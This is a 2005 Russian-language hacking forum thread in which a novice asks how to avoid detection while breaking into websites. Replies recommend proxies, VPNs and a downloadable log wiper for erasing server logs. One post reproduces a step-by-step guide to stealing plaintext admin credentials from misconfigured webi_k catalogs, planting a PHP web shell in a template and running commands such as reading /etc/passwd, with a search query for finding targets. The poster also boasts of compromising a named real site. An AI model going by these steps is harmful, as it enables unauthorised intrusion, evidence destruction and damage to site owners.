Как можно засветиться при взломе сайта?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Как можно засветиться при взломе сайта? - 2005-02-04 23:36:07
|
|
|
HardWARE
Сообщений: 26
Оценки: 0
Присоединился: 2005-02-03 10:56:40
|
Челы помогите, как можно незасветиться при взломе сайта, и какие проги нужны?
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-05 00:58:12
|
|
|
k1cker
Сообщений: 20
Оценки: 0
Присоединился: 2004-03-16 01:04:58
|
Ну через проксю сиди, ip спрячешь свой или VPN сервис какой-нить заюзай…
Смотря что взламывать и как…!!!
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-05 02:05:03
|
|
|
HardWARE
Сообщений: 26
Оценки: 0
Присоединился: 2005-02-03 10:56:40
|
У меня Dial-Up я DNS неставил, у меня ip генерируется, всеравно через прокси? А Прокси в OPERе настраивать, или через прогу типа Steganos Anonym Pro?
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-05 22:48:31
|
|
|
leg10ner
Сообщений: 16
Оценки: 0
Присоединился: 2005-01-29 17:26:54
|
Проксей и носками можна и не пользоваться, если после взлома грамотно почистить логи на сервере.
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-06 10:55:33
|
|
|
CheFF
Сообщений: 14
Оценки: 0
Присоединился: 2005-02-04 12:34:55
|
А если не успеешь???
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-06 17:44:45
|
|
|
leg10ner
Сообщений: 16
Оценки: 0
Присоединился: 2005-01-29 17:26:54
|
А чего там не успевать ? Не успеть можна если тебя посек злобный админ, но это уже другая тема.
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-07 22:14:39
|
|
|
HardWARE
Сообщений: 26
Оценки: 0
Присоединился: 2005-02-03 10:56:40
|
А если я их ещё неумею чистить!
Научите! А?
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-08 09:20:22
|
|
|
leg10ner
Сообщений: 16
Оценки: 0
Присоединился: 2005-01-29 17:26:54
|
Качаешь логвайпер,
скажем Vanish (http://www.nsd.ru/soft/1/vanish2.gz),
заливаешь на сервер, устанавливаешь и чистишь.
Все интуитивно понятно.
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-08 22:40:17
|
|
|
HardWARE
Сообщений: 26
Оценки: 0
Присоединился: 2005-02-03 10:56:40
|
http://nsd.ru/soft/1/anonimus/vanish2.tgz ващето ссылка, а у тя есть статья какая нить по взлому сайтов?
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-08 22:50:51
|
|
|
leg10ner
Сообщений: 16
Оценки: 0
Присоединился: 2005-01-29 17:26:54
|
http://www.xakep.ru//magazine/xa/069/080/1.asp
вот прикольная статья, там все в пожробностях изложено, так что дерзай (это о чистке логов)…
А о взломе сайтов ещи там же… Там точно есть.
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-09 11:20:48
|
|
|
HardWARE
Сообщений: 26
Оценки: 0
Присоединился: 2005-02-03 10:56:40
|
ДА! =) Я нашёл, прочитал обе, да и ещё по инету поюзал кое что откопал:
Webi_k – это популярный каталог ссылок от русских разработчиков.
Сейчас я расскажу вам как можно получить много веб-шелов.
Для удачного результата – нужен браузер, яндекс и прямые руки ;-)
Может сам webi_k и не такой уж дырявый, однако админы частенько его неправильно устанавливают, чем мы сейчас и воспользуемся.
Все данные и конфиги каталога находятся в папке baze, и очень часто админы не закрывают доступ на чтение конфига извне. В этом конфиге хранится логин и пароль простым текстом. Открываем файл http://www.target.com/katalg/baze/conf.wbi, там увидите что-то вроде этого:
login:::password::: 1:::20:::1:::1:::URL ссылки:::Название ссылки:::Описание ссылки :::ID ссылки::::::::: :::::::::::::::::::::::::::::::::::::::::::::
Берем отсюда login и password, заходим в админку (http://www.target.com/katalg/baze/admin.php), далее жмем настройки >> шаблоны.
Здесь можно редактировать шаблоны =)
Например выбираем “Шаблон результатов поиска”, идем в самый низ (чтоб админ не заметил), вставляем следующий код:
<pre>
<?php
system($cmd);
?>
</pre>
Далее жмем изменить, проверяем сохранилось ли (на всякий случай). Сам веб-шел будет по адресу:
http://www.target.com/katalg/baze/poisk.php?cmd=id
http://www.target.com/katalg/baze/poisk.php?cmd=ls
http://www.target.com/katalg/baze/poisk.php?cmd=cat /etc/paswd
Вот мы и получили
заветный веб-шел, далее можно полазить по серверу и попытаться поднять свои права =)
Как искать уязвимые сайты в яндексе?
Вот пример запроса: index.php idk 3 (Результат поиска: страниц — 2417, сайтов — не менее 614).
Удачных поисков!
Оригинал: http://www.rootlab.ru/articles.php?id=1
Вот, кстати полезно! =)
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-09 16:42:10
|
|
|
Showjumper
Сообщений: 10
Оценки: 0
Присоединился: 2005-02-07 09:14:10
|
Стеганос - рульная весч, но есть один прикол: он защмищает только от внешних атак, но при соедининиях с твоей стороны он работает на прямую. Вот так вот. Он карече открывате канал связи с твоим IP для всяческих та ИЕ-Експлореров, Реджетов-Флешгетов, кароче везде где соединение станавливаешь ТЫ - он с радостью отдает твой IP-адрес :)
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-09 16:44:04
|
|
|
222
Сообщений: 33
Оценки: 0
Присоединился: 2004-10-04 13:58:43
|
не заморачивайся - если ты сидишь на диал-апе, то вообще можно ничего не делать в такой ситуации - никто тебя засечь не сможет
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-10 11:29:30
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
Запросто сможет. Просто в большинстве случаев это никому нафиг не надо.
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-10 12:50:18
|
|
|
HardWARE
Сообщений: 26
Оценки: 0
Присоединился: 2005-02-03 10:56:40
|
Помогите с внишом разобраться, я никогда невстречался с таким![sm=sm128.gif]
P.S. Я вчера взломал www.gardex.ru наюзал Логин и Пароль, пошалил, а как теперь мне туда загрузить чё нибудь, там ничего нет (в смысле ссылки или каталога), кто хочет посмотреть, Логин и Пароль могу кинуть на мыло![sm=001.gif]
P.P.S. И какраз почистите логи за меня! [sm=9.gif]
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-10 13:20:43
|
|
|
222
Сообщений: 33
Оценки: 0
Присоединился: 2004-10-04 13:58:43
|
Нет, не сможет - достаточно банального РАБОТАЮЩЕГО (!!!) антиАОНа - и все дела[sm=em121.gif]
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-10 13:27:16
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
Ну, во-первых, это уже совсем другой разговор. Я собстно о твое фразе "можно ничего не делать в такой ситуации". Это уже не совсем "ничего не делать" :)
С банальным работающим антиаоном нормальный пров просто не пустит на сервер, а вот если поменять свой номер на другой - другое дело.
|
|
|
|
|
Как можно засветиться при взломе сайта? - 2005-02-10 22:53:46
|
|
|
HardWARE
Сообщений: 26
Оценки: 0
Присоединился: 2005-02-03 10:56:40
|
Что делает этот "скрипт":
<pre>
<?php
system($cmd);
?>
</pre>
???
А можно как нибудь заюзать свой прокси-сервер, тока не на своей машине, а на чужой через инет?
|
|
|
|
|
|
